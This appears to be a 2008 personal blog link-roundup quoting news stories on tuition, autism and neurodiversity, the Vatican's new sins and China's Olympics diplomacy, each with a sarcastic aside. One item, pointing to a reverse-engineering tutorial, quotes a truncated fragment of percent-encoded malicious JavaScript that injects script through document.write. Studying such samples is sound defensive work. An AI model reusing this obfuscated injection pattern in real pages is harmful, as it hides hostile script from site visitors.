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Thursday, March 13, 2008

"Anybody caught selling macrame in public should be dyed a natural color and hung out to dry." - Calvin Trillin


Facebook | Stop the rising tuition fee hike for college students ! - "Rising tuition fees are sucking the life out of college students around the world, both literally and indirectly. Its much sexier lowering tuition fees, don't you agree. Invite all your college friends ! Lets grow this group to 1,000,000 !"
They should go to Europe and see what happens when you have no tuition fees.

NEURODIVERSITY: JUST SAY NO - "A number of high functioning autistics claim that there is a consensus among all autistic persons that finding a cure for autism would be a horrible thing. Autism is a part of who they are and to take away the autism is to take away the person. They go further to claim that autism is not really a disorder but just a different form of brain wiring--some call this philosophy "neurodiversity"... One young, angry autistic female even goes as far as claiming that persons desiring a cure for autism are responsible for the murder of Katie McCarron, a 3-year-old autistic girl who was brutally murdered by her mother when her mother could not deal with her autism and other autistic toddlers who were senselessly murdered by their parents. I do find this reasoning insulting, insinuating that I am even in an indirect manner responsible for a small autistic child's murder."

Carlos the Jackal sneers at Al-Qaeda’s ‘amateur’ killers - "He condemned Al-Qaeda followers without specific targets, saying: “They are not professionals. They’re not organised. They don’t even know how to make proper explosives or proper detonators.”"

Women power: how to market to 51% of Americans - "By 2010, women are expected to control $1 trillion, or 60% of the country's wealth, according to research conducted by BusinessWeek and Gallup. Women purchase or influence the purchase of 80% of all consumer goods, including stocks, computers and automobiles. Women earn more than half of all accounting degrees, four out of every 10 law degrees and almost that many medical degrees."
It doesn't matter! They're still being repressed!

Fewer confessions and new sins - "The Vatican has brought up to date the traditional seven deadly sins by adding seven modern mortal sins it claims are becoming prevalent in what it calls an era of "unstoppable globalisation"... According to a survey carried out here 10 years ago by the Catholic University, 60% of Italians have stopped going to confession altogether. The situation has certainly not improved during the past decade... Archbishop Girotti said he thought the most dangerous areas for committing new types of sins lay in the fields of bio-ethics and ecology. He also named abortion and paedophilia as two of the greatest sins of our times. The archbishop brushed off cases of sexual violence against minors committed by priests as "exaggerations by the mass media aimed at discrediting the Church"."
Naturally, there're no exaggerations by the Church aimed at...

Recycle or go to Hell, warns Vatican - "Failing to recycle plastic bags could find you spending eternity in Hell, the Vatican said after drawing up a list of seven deadly sins for our times... Mgr Girotti said genetic modification, carrying out experiments on humans, polluting the environment, causing social injustice, causing poverty, becoming obscenely wealthy and taking drugs were all mortal sins."
They're so much snappier in headlines than the BBC. But at least they gave us the list of 7. Too bad they didn't point out what's wrong with the Catholic Church condemning the 'obscenely wealthy'. Also interesting: causing poverty is a mortal sin, so opposing free trade agreements sends you to hell. And since Benedict XVI opposes short-term job contracts, he's going to hell.

Reverse Engineering Malicious Javascript - How to find out what stuff like "<script>document.write(unescape(%3c %73 %63 %72 %69 %70 %74 %3e %64 %6f %63 %75 %6d %65 %6e %74 %2e %77 %72 %69 %74 %65 %28 %53 %74 %72 %69 %6e %67 %2e %66 %72 %6f %6d %43 %68 %61 %72 %43 %6f %64 %65 %28 %36 %30 %2c %31 %30 %35 %2c %31 %30 %32 %2c %31 %31 %34 %2c %39 %37 %2c %31 %30 %39 %2c... %31 %30 %31 %2c %36 %32 %29 %29 %3b %3c %2f %73 %63 %72 %69 %70 %74 %3e'))</script>" means. Also, an easier way.

China warns US against practising double standards - "Chinese Foreign Minister Yang Jiechi has hit out against the US for politicising the Olympics in the name of human rights... Replying to allegations that China had politicised the Beijing Olympics and violated human rights, Mr Yang noted that these criticisms did not come from the international community, but from a group of biased individuals who are "attacking China"."
What's sauce for the goose... I love how he begged the question about 'double standards' and "Patriotism and politicising the Olympic Games are two different things" is an absolute gem
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